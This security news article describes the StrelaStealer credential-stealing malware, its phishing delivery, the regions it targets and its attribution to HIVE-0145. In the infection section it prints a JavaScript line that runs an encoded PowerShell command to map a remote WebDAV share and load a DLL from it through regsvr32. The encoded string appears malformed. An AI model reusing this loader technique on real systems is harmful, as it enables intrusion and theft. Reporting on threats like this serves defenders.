This malicious software specifically targets email credentials from popular clients such as Microsoft Outlook and Mozilla Thunderbird, creating significant security risks for organizations worldwide.

The malware operates by exfiltrating sensitive login information, potentially providing attackers with access to critical communications and data.

StrelaStealer spreads primarily through large-scale phishing campaigns that deliver ZIP archives containing malicious JavaScript files.

These initial infection vectors serve as the first stage in a complex attack chain, where the scripts retrieve a malicious DLL payload from a WebDAV server and execute it directly in memory, avoiding many traditional detection methods.

The sophisticated delivery mechanism allows attackers to bypass standard security controls while maintaining operational effectiveness.

The malware campaigns have impacted over 100 organizations across Europe and the United States, with particular concentration in Italy, Spain, Germany, and Ukraine.

The widespread nature of these attacks suggests a well-orchestrated campaign with specific targeting parameters rather than random distribution.

AttackIQ researchers identified that StrelaStealer is associated with the threat actor group designated as HIVE-0145, a cluster active since late 2022.

Security analysts believe this group operates as a financially motivated initial access broker, potentially serving as the sole operator behind StrelaStealer deployments.

The identification of the threat actor provides valuable context for understanding the malware’s objectives and operational patterns.

Recent analysis from November 2024 revealed updated delivery and obfuscation techniques, demonstrating the malware’s continued evolution.

These enhancements indicate active development and maintenance of the threat, suggesting ongoing campaigns.

Infection Mechanism Deep Dive

The StrelaStealer infection process begins when victims execute the JavaScript file from the ZIP archive, typically using the Windows Script Host (CScript or WScript).

The initial script employs multi-stage obfuscation, with recent variants observed using the following technique:-

var encoded = "powershell.exe -enc UEdVdEFBQiB1c2UgXFxcXDEwLjEwLjEwLjEwXFxzaGFyZSAvcGVyc2lzdDpubzsgcmVnc3ZyMzIgXFxcXDEwLjEwLjEwLjEwXFxzaGFyZVxwYXlsb2FkLmRsbA=="
WScript.CreateObject("WScript.Shell").Run(encoded,0,true);

This code spawns a PowerShell process that executes an encoded command to map a WebDAV network path, followed by using Regsvr32 to remotely register and execute the DLL payload hosted on that share.

The malware then performs extensive system reconnaissance, collecting information about the host system, installed applications, country locale, and internet connectivity before exfiltrating the gathered data over unencrypted HTTP connections.

This sophisticated approach demonstrates the threat actor’s commitment to stealth and operational security while maintaining effective credential harvesting capabilities across targeted organizations.

Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy